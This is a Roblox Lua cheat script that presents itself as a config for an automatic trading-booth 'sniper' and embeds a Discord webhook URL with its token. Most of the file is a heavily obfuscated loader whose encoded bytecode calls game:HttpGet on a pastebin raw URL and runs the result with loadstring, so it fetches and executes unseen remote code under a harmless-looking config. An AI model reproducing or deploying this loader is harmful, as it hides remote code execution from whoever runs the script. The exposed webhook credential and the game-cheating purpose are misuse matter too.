getgenv().config = {
    boothSniper = {
        autoSnipe = true,
        snipeItem = {
            {Class = "Misc", Name = "Epic Glitch Core", Price = 70000}
        }
    },
    snipingMethod = "Terminal" --Terminal/Manual/Automated | Automated checks if terminal is not working and then uses manual.
}

webhook = "https://discord.com/api/webhooks/1189216042250149918/Hk4tcVmlMgWWDY4fhXaIrEm-3jMY74yCjJDE5ppUh8pQiSJOXhGz_rR4_ZfXGXjYcOkL"



local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v90=v5(v85,v19);v19=nil;return v90;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-(569 -(367 + 201)))))%(((2199 -(226 + 1044)) -(214 + 713))^(((v33-(2 -1)) -(v32-(1 -0))) + (878 -(282 + 595)))) ;return v86-(v86%(2 -1)) ;else local v87=(2 + 0)^(v32-(620 -(555 + 64))) ;return (((v31%(v87 + v87))>=v87) and (1066 -((295 -227) + 997))) or (931 -(857 + 74)) ;end end local function v21() local v34=117 -((58 -26) + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=2 -1 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (352 -(64 + 23 + 263)) );v18=v18 + (182 -(67 + 113)) ;v36=2 -1 ;end if (v36==(1 + 0)) then return (v38 * 256) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + (11 -7) ;return (v42 * (9773502 + 7003714)) + (v41 * (86188 -20652)) + (v40 * (1443 -(1069 + (267 -149)))) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(887 -(261 + 624))) then v48=v20(v45,4 + 17 ,54 -23 );v49=((v20(v45,32 + 0 )==(792 -(368 + 423))) and  -1) or (3 -2) ;v43=21 -(10 + 8) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=443 -(416 + 26) ;end if (v43==(9 -(865 -(814 + 45)))) then if (v48==((0 -0) + 0)) then if (v47==(0 -0)) then return v49 * (438 -(145 + 293)) ;else v48=431 -(44 + 386) ;v46=0 -0 ;end elseif (v48==(3533 -(998 + 488))) then return ((v47==(0 + (1080 -(1020 + 60)))) and (v49 * ((1 + 0)/(772 -((1624 -(630 + 793)) + 571))))) or (v49 * NaN) ;end return v8(v49,v48-(2161 -(116 + 1022)) ) * (v46 + (v47/(((1 + 7) -6)^52))) ;end if ((1 + 0)==v43) then v46=3 -(1 + 1) ;v47=(v20(v45,1,20) * (2^(113 -(274 -193)))) + v44 ;v43=2;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(4 -3) );v18=v18 + v50 ;local v52={};for v69=1, #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v53~=(585 -(57 + 527))) then else v56=nil;v57=nil;v53=2;end if (v53~=4) then else v62=nil;while true do if (v54==(1430 -(41 + 1386))) then local v97=103 -(17 + 86) ;while true do if ((1 + 0)~=v97) then else v54=4;break;end if (v97==0) then v61=nil;v62=nil;v97=1 -0 ;end end end if (v54~=4) then else while true do if (v55~=(0 -0)) then else local v99=0;local v100;while true do if (v99~=0) then else v100=0;while true do if (v100==1) then v55=1;break;end if (v100==(166 -(122 + 44))) then local v139=0 -0 ;while true do if (v139==0) then v56=0;v57=nil;v139=3 -2 ;end if (v139==(1 + 0)) then v100=1;break;end end end end break;end end end if (v55~=2) then else local v101=0 + 0 ;while true do if (v101==0) then local v111=0;while true do if (v111==(1 -0)) then v101=66 -(30 + 35) ;break;end if (v111~=(0 + 0)) then else v60=nil;v61=nil;v111=1;end end end if (v101~=1) then else v55=3;break;end end end if (v55==3) then v62=nil;while true do local v103=1257 -(1043 + 214) ;local v104;while true do if (v103~=(0 -0)) then else v104=1212 -(323 + 889) ;while true do if (v104~=(0 -0)) then else local v140=0;while true do if (v140==0) then local v154=580 -(361 + 219) ;while true do if (v154==1) then v140=321 -(53 + 267) ;break;end if (v154==(0 + 0)) then if (v56~=(415 -(15 + 398))) then else local v155=0;local v156;while true do if (v155==0) then v156=0;while true do if (v156==(983 -(18 + 964))) then for v167=1,v23() do local v168=0;local v169;local v170;while true do if (v168==(0 -0)) then v169=0;v170=nil;v168=1;end if (v168==1) then while true do if (v169~=0) then else v170=v21();if (v20(v170,1,1)~=(0 + 0)) then else local v179=0 + 0 ;local v180;local v181;local v182;local v183;local v184;while true do if (v179~=0) then else v180=850 -(20 + 830) ;v181=nil;v179=1;end if (v179==1) then local v185=0;while true do if (v185==(0 + 0)) then v182=nil;v183=nil;v185=127 -(116 + 10) ;end if (v185==(1 + 0)) then v179=2;break;end end end if (v179~=(740 -(542 + 196))) then else v184=nil;while true do if (v180~=(0 -0)) then else local v187=0 + 0 ;while true do if (v187~=0) then else local v192=0 + 0 ;while true do if (v192~=0) then else v181=0;v182=nil;v192=1 + 0 ;end if (v192==1) then v187=1;break;end end end if (v187==(2 -1)) then v180=1;break;end end end if (v180==(2 -1)) then local v188=1551 -(1126 + 425) ;while true do if (v188==0) then v183=nil;v184=nil;v188=406 -(118 + 287) ;end if (v188~=(3 -2)) then else v180=2;break;end end end if (v180==(1123 -(118 + 1003))) then while true do if ((0 -0)==v181) then local v193=0;local v194;while true do if (v193==(377 -(142 + 235))) then v194=0 -0 ;while true do if ((1 + 0)~=v194) then else v181=1;break;end if (0==v194) then local v205=0;while true do if (v205==(977 -(553 + 424))) then v182=v20(v170,3 -1 ,3);v183=v20(v170,4,6 + 0 );v205=1;end if (v205==(1 + 0)) then v194=1;break;end end end end break;end end end if (2==v181) then local v195=0 + 0 ;local v196;local v197;while true do if (v195==1) then while true do if (v196~=0) then else v197=0 + 0 ;while true do if (v197==(1 + 0)) then v181=6 -3 ;break;end if (v197==(0 -0)) then local v209=0;while true do if (v209~=(0 -0)) then else if (v20(v183,1 + 0 ,1)~=1) then else v184[2]=v62[v184[9 -7 ]];end if (v20(v183,755 -(239 + 514) ,1 + 1 )~=1) then else v184[1332 -(797 + 532) ]=v62[v184[3 + 0 ]];end v209=1 + 0 ;end if ((2 -1)~=v209) then else v197=1203 -(373 + 829) ;break;end end end end break;end end break;end if (0~=v195) then else v196=731 -(476 + 255) ;v197=nil;v195=1;end end end if (v181==(1133 -(369 + 761))) then if (v20(v183,2 + 1 ,5 -2 )==(1 -0)) then v184[4]=v62[v184[4]];end v57[v167]=v184;break;end if (v181==(239 -(64 + 174))) then local v199=0 + 0 ;local v200;while true do if (v199~=(0 -0)) then else v200=0;while true do if (v200~=(337 -(144 + 192))) then else v181=2;break;end if (v200==(216 -(42 + 174))) then v184={v22(),v22(),nil,nil};if (v182==0) then local v206=0 + 0 ;local v207;local v208;while true do if (v206~=(1504 -(363 + 1141))) then else v207=0;v208=nil;v206=1581 -(1183 + 397) ;end if (v206~=1) then else while true do if (v207==0) then v208=0;while true do if ((0 -0)==v208) then v184[3 + 0 ]=v22();v184[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v182==1) then v184[3]=v23();elseif (v182==2) then v184[3]=v23() -(2^16) ;elseif (v182~=3) then else local v217=0;local v218;local v219;while true do if (1==v217) then while true do if (v218==(1975 -(1913 + 62))) then v219=0 + 0 ;while true do if (v219==(0 -0)) then v184[3]=v23() -(2^(1949 -(565 + 1368))) ;v184[4]=v22();break;end end break;end end break;end if ((0 -0)~=v217) then else v218=0;v219=nil;v217=1662 -(1477 + 184) ;end end end v200=1 -0 ;end end break;end end end end break;end end break;end end end break;end end break;end end end v56=3 + 0 ;break;end if (v156==(856 -(564 + 292))) then local v163=0 -0 ;while true do if ((2 -1)~=v163) then else v156=1;break;end if (v163~=0) then else local v171=0;while true do if (v171==1) then v163=1;break;end if (v171~=(304 -(244 + 60))) then else for v173=1,v61 do local v174=0 + 0 ;local v175;local v176;local v177;local v178;while true do if (v174==(477 -(41 + 435))) then v177=nil;v178=nil;v174=1003 -(938 + 63) ;end if (v174==(2 + 0)) then while true do if ((1125 -(936 + 189))==v175) then local v186=0 + 0 ;while true do if (v186==0) then v176=1613 -(1565 + 48) ;v177=nil;v186=1 + 0 ;end if (v186==(1139 -(782 + 356))) then v175=1;break;end end end if (v175~=1) then else v178=nil;while true do if (v176~=(268 -(176 + 91))) then else if (v177==1) then v178=v21()~=0 ;elseif (v177==(4 -2)) then v178=v24();elseif (v177==(4 -1)) then v178=v25();end v62[v173]=v178;break;end if ((1092 -(975 + 117))==v176) then local v190=1875 -(157 + 1718) ;local v191;while true do if (0~=v190) then else v191=0 + 0 ;while true do if (v191==(3 -2)) then v176=3 -2 ;break;end if (v191==0) then local v203=0;local v204;while true do if (v203==(1018 -(697 + 321))) then v204=0 -0 ;while true do if (v204==(1 -0)) then v191=2 -1 ;break;end if (v204~=(0 + 0)) then else local v211=0;while true do if (v211==(0 -0)) then v177=v21();v178=nil;v211=1;end if (v211==(2 -1)) then v204=1228 -(322 + 905) ;break;end end end end break;end end end end break;end end end end break;end end break;end if (v174==(611 -(602 + 9))) then v175=0;v176=nil;v174=1190 -(449 + 740) ;end end end v60[3]=v21();v171=873 -(826 + 46) ;end end end end end end break;end end end if (v56==0) then local v157=947 -(245 + 702) ;local v158;while true do if (v157~=0) then else v158=0;while true do if (v158==1) then v59={};v56=3 -2 ;break;end if ((0 + 0)~=v158) then else local v164=0;local v165;while true do if (v164~=(1898 -(260 + 1638))) then else v165=0;while true do if (v165==(441 -(382 + 58))) then v158=3 -2 ;break;end if (v165~=(0 + 0)) then else v57={};v58={};v165=1;end end break;end end end end break;end end end v154=1 -0 ;end end end if (v140==1) then v104=2 -1 ;break;end end end if (1==v104) then if (v56==(1206 -(902 + 303))) then local v150=0 -0 ;local v151;while true do if (0~=v150) then else v151=0 -0 ;while true do if (v151~=(0 + 0)) then else local v159=0;local v160;while true do if (v159==0) then v160=1690 -(1121 + 569) ;while true do if (v160==(214 -(22 + 192))) then local v166=683 -(483 + 200) ;while true do if (v166==(1464 -(1404 + 59))) then v160=2 -1 ;break;end if (v166==0) then v60={v57,v58,nil,v59};v61=v23();v166=766 -(468 + 297) ;end end end if (v160==(563 -(334 + 228))) then v151=1;break;end end break;end end end if ((3 -2)==v151) then v62={};v56=4 -2 ;break;end end break;end end end if (v56==3) then local v152=0;local v153;while true do if (v152==(0 -0)) then v153=0 + 0 ;while true do if (0~=v153) then else for v161=237 -(141 + 95) ,v23() do v58[v161-(1 + 0) ]=v28();end return v60;end end break;end end end break;end end break;end end end break;end if (v55~=1) then else local v102=0;while true do if (v102~=(0 -0)) then else v58=nil;v59=nil;v102=2 -1 ;end if (v102==(1 + 0)) then v55=2;break;end end end end break;end if (v54==0) then local v98=0;while true do if (v98==(2 -1)) then v54=1 + 0 ;break;end if (v98~=0) then else v55=0 + 0 ;v56=nil;v98=1 -0 ;end end end if (v54~=(2 + 0)) then else v59=nil;v60=nil;v54=3;end if (v54==1) then v57=nil;v58=nil;v54=165 -(92 + 71) ;end end break;end if (v53==2) then v58=nil;v59=nil;v53=3;end if ((0 + 0)~=v53) then else v54=0;v55=nil;v53=1;end if ((4 -1)==v53) then v60=nil;v61=nil;v53=769 -(574 + 191) ;end end end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...) local v71=v66;local v72=v67;local v73=v68;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v88=0,v79 do if (v88>=v73) then v77[v88-v73 ]=v78[v88 + 1 ];else v81[v88]=v78[v88 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do local v89=0;while true do if (v89==1) then if (v84<=6) then if (v84<=2) then if (v84<=0) then local v105=v83[2];local v106,v107=v74(v81[v105](v13(v81,v105 + 1 ,v83[3])));v76=(v107 + v105) -1 ;local v108=0;for v112=v105,v76 do v108=v108 + 1 ;v81[v112]=v106[v108];end elseif (v84>1) then v81[v83[2]]=v65[v83[3]];else v81[v83[2]]();end elseif (v84<=4) then if (v84>3) then local v117=v83[2];v81[v117]=v81[v117](v13(v81,v117 + 1 ,v76));else v81[v83[2]]();end elseif (v84>5) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v83[2];v121=v81[v83[3]];v119=1;end if (v119==1) then v81[v120 + 1 ]=v121;v81[v120]=v121[v83[4]];break;end end else local v122=v83[2];local v123,v124=v74(v81[v122](v13(v81,v122 + 1 ,v83[3])));v76=(v124 + v122) -1 ;local v125=0;for v137=v122,v76 do local v138=0;while true do if (v138==0) then v125=v125 + 1 ;v81[v137]=v123[v125];break;end end end end elseif (v84<=9) then if (v84<=7) then v81[v83[2]]=v83[3];elseif (v84>8) then local v126=0;local v127;while true do if (v126==0) then v127=v83[2];v81[v127]=v81[v127](v13(v81,v127 + 1 ,v76));break;end end else do return;end end elseif (v84<=11) then if (v84>10) then v81[v83[2]]=v65[v83[3]];else do return;end end elseif (v84==12) then local v130=v83[2];local v131=v81[v83[3]];v81[v130 + 1 ]=v131;v81[v130]=v131[v83[4]];else v81[v83[2]]=v83[3];end v75=v75 + 1 ;break;end if (v89==0) then v83=v71[v75];v84=v83[1];v89=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F645665377144624D00083O00120B3O00013O00120B000100023O00200C00010001000300120D000300046O000100034O00095O00022O00013O000100012O00083O00017O00",v9(),...);
